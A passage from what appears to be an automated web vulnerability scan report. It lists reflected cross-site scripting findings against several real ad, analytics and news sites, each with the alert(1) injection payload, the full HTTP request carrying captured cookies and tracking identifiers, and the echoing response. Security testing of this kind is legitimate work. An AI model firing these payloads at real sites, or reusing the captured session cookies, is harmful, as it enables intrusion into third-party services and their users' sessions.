Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311385526307:ss=1311385526307; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/22/2011 15:42:09&Microsoft.VisitStartDate=07/22/2011 15:42:09&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=32&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!&GO=244; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet|msdn:1=:2=; msdn=L=1033; mcI=Thu, 28 Jul 2011 23:10:45 GMT; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Cteonnt-Length: 143
Content-Type: application/x-javascript
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Date: Sat, 23 Jul 2011 04:46:29 GMT
Content-Length: 143

jsonp1311396321262({"Matches":[],"Term":"84e17<img%20src%3da%20onerror%3dalert(1)>8704c19d382=1deba5<img src=a onerror=alert(1)>680b3dd871d"});

3.80. http://sgy.sitescout.com/tag.jsp [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sgy.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5547'%3balert(1)//3001d813790 was submitted in the h parameter. This input was echoed as a5547';alert(1)//3001d813790 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=5F090D8&w=300&h=250a5547'%3balert(1)//3001d813790&rnd=8141575 HTTP/1.1
Host: sgy.sitescout.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=4;sz=300x250,1x1;frId=ad_4_2;ord=101352252258050

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 383
Date: Thu, 21 Jul 2011 19:31:16 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://sgy.sitescout.com/disp?pid=5F090D8&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250a5547';alert(1)//3001d813790" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.81. http://sgy.sitescout.com/tag.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sgy.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 289dd"%3balert(1)//cc9192e141b was submitted in the pid parameter. This input was echoed as 289dd";alert(1)//cc9192e141b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=5F090D8289dd"%3balert(1)//cc9192e141b&w=300&h=250&rnd=8141575 HTTP/1.1
Host: sgy.sitescout.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=4;sz=300x250,1x1;frId=ad_4_2;ord=101352252258050

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 383
Date: Thu, 21 Jul 2011 19:30:51 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://sgy.sitescout.com/disp?pid=5F090D8289dd";alert(1)//cc9192e141b&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.82. http://sgy.sitescout.com/tag.jsp [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sgy.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83bb2'%3balert(1)//fd0bb5244ec was submitted in the w parameter. This input was echoed as 83bb2';alert(1)//fd0bb5244ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=5F090D8&w=30083bb2'%3balert(1)//fd0bb5244ec&h=250&rnd=8141575 HTTP/1.1
Host: sgy.sitescout.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=4;sz=300x250,1x1;frId=ad_4_2;ord=101352252258050

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 383
Date: Thu, 21 Jul 2011 19:31:01 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://sgy.sitescout.com/disp?pid=5F090D8&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="30083bb2';alert(1)//fd0bb5244ec" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.83. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83bc3'-alert(1)-'7568d65213a was submitted in the frameName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.php&frameName=83bc3'-alert(1)-'7568d65213a&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.5989337249714323&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Thu, 21 Jul 2011 18:00:59 GMT
Content-Length: 1398
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 20-Jul-2012 18:00:59 GMT; path=/
Set-Cookie: pubfreq_26922_21908_386505509=165-1; domain=pubmatic.com; expires=Thu, 21-Jul-2011 18:40:59 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Fri, 22-Jul-2011 18:00:59 GMT; path=/

document.write('<div id="83bc3'-alert(1)-'7568d65213a" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=O2QAACppAACUVQAAAAAAAAAAAAAAAAAAAAAAAAAAAABjdAAApQAAANgCAABaAAAAAAAAAAEAAABFRDczODFBOC1GOUFCLTQ
...[SNIP]...

3.84. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af24a'-alert(1)-'716b9fb4375 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.phpaf24a'-alert(1)-'716b9fb4375&frameName=http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.5989337249714323&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Thu, 21 Jul 2011 18:00:59 GMT
Content-Length: 1469
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 20-Jul-2012 18:00:59 GMT; path=/
Set-Cookie: pubfreq_26922_21908_131233610=165-1; domain=pubmatic.com; expires=Thu, 21-Jul-2011 18:40:59 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Fri, 22-Jul-2011 18:00:59 GMT; path=/

document.write('<div id="http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...
fact=0.000000&kadNetFrequecy=2&kadwidth=728&kadheight=90&kltstamp=1311271259&indirectAdId=29795&adServerOptimizerId=1&ranreq=0.5989337249714323&pageURL=http://www.myyearbook.com/advertising/default.phpaf24a'-alert(1)-'716b9fb4375">
...[SNIP]...

3.85. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c0d3'-alert(1)-'177d7fba2be was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.php&frameName=http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.59893372497143236c0d3'-alert(1)-'177d7fba2be&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1469
Date: Thu, 21 Jul 2011 18:01:00 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 20-Jul-2012 18:01:00 GMT; path=/
Set-Cookie: pubfreq_26922_21908_2127498912=165-1; domain=pubmatic.com; expires=Thu, 21-Jul-2011 18:41:00 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Fri, 22-Jul-2011 18:01:00 GMT; path=/

document.write('<div id="http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...
eId=26922&adId=21908&adServerId=165&kefact=0.400000&kpbmtpfact=0.000000&kadNetFrequecy=2&kadwidth=728&kadheight=90&kltstamp=1311271260&indirectAdId=29795&adServerOptimizerId=1&ranreq=0.59893372497143236c0d3'-alert(1)-'177d7fba2be&pageURL=http://www.myyearbook.com/advertising/default.php">
...[SNIP]...

3.86. http://sitelife.boston.com/ver1.0/Direct/Jsonp [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.boston.com
Path:   /ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 5c5f8<script>alert(1)</script>2a6b2a04253 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Direct/Jsonp?r={%22Requests%22%3A[{%22ArticleKey%22%3A{%22Key%22%3A%2220110723_1052263300%22}}]%2C%22UniqueId%22%3A0}&cb=bcOverCom5c5f8<script>alert(1)</script>2a6b2a04253&noCacheIE=1311428812606 HTTP/1.1
Host: sitelife.boston.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804GIB4AATB3; s_vi=[CS]v1|2703101A8516139C-400001A3C00CA954[CE]; anonId=c78dd2a2-2fd6-478d-a9a0-c99ad34539e3; mbox=check#true#1311428842|session#1311428781592-195064#1311430642|level#10#1321796782|traffic#true#1321796782|PC#1311428781592-195064.17#1312638385; __unam=b6206f2-130c7ed914a-12883c53-5; RMFD=011QkcXHO1060Og; sslife=1; s_cc=true; s_pv=Lifestyle%20%7C%20Other%20%7C%20Facebook%2C%20Twitter%20obligations%20persist%20during%20vacations; s_sq=%5B%5BB%5D%5D; AxData=; Axxd=1; bcpage=6; s_ppv=27

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 878
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm104l3pluckcom
Set-Cookie: SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/
Date: Sat, 23 Jul 2011 13:50:16 GMT

bcOverCom5c5f8<script>alert(1)</script>2a6b2a04253({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"07/23/2011 09:46:19:067 AM"}],"Responses":[{"Article":{"ArticleKey":{"Key":"20110723_1052263300"},"Section":{"Name":"'globe story: liv'"},"
...[SNIP]...

3.87. http://sm6.sitemeter.com/js/counter.asp [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sm6.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e038'%3balert(1)//f4ecbb39fe5 was submitted in the site parameter. This input was echoed as 7e038';alert(1)//f4ecbb39fe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.asp?site=sm6damnhippy7e038'%3balert(1)//f4ecbb39fe5 HTTP/1.1
Host: sm6.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Jul 2011 13:43:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Sat, 23 Jul 2011 13:53:19 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('sm6damnhippy7e038';alert(1)//f4ecbb39fe5', 'sm6.sitemeter.com', '');

var g_sLastCodeName = 'sm6damnhippy7e038';alert(1)//f4ecbb39fe5';
// ]]>
...[SNIP]...

3.88. http://sm6.sitemeter.com/js/counter.js [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sm6.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9549'%3balert(1)//451a5745b3f was submitted in the site parameter. This input was echoed as e9549';alert(1)//451a5745b3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=sm6damnhippye9549'%3balert(1)//451a5745b3f HTTP/1.1
Host: sm6.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Jul 2011 13:18:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Sat, 23 Jul 2011 13:28:59 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('sm6damnhippye9549';alert(1)//451a5745b3f', 'sm6.sitemeter.com', '');

var g_sLastCodeName = 'sm6damnhippye9549';alert(1)//451a5745b3f';
// ]]>
...[SNIP]...

3.89. http://social.msdn.microsoft.com/Search/en-US [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://social.msdn.microsoft.com
Path:   /Search/en-US

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload ebb6e%20a%3db2dac2458762 was submitted in the REST URL parameter 2. This input was echoed as ebb6e a=b2dac2458762 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Search/en-USebb6e%20a%3db2dac2458762?query=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1&Refinement=123&ac=8 HTTP/1.1
Host: social.msdn.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311385526307:ss=1311385526307; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/22/2011 15:42:09&Microsoft.VisitStartDate=07/22/2011 15:42:09&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=32&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!&GO=244; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet|msdn:1=:2=; msdn=L=1033; mcI=Thu, 28 Jul 2011 23:10:45 GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_NVR=0=/:1=en-us:2=en-us/vstudio

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 04:47:45 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB45
Date: Sat, 23 Jul 2011 04:47:45 GMT
ntCoent-Length: 23630
Content-Length: 23630


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head
...[SNIP]...
<a id="clr_All" href=/search/en-US/en-USebb6e a=b2dac2458762?query=84e17%3cimg%2520src%253da%2520onerror%253dalert%281%29%3e8704c19d382%3d1 >
...[SNIP]...

3.90. http://sr2.liveperson.net/visitor/addons/deploy2.asp [site parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /visitor/addons/deploy2.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload d539f%0acb95731872f was submitted in the site parameter. This input was echoed as d539f
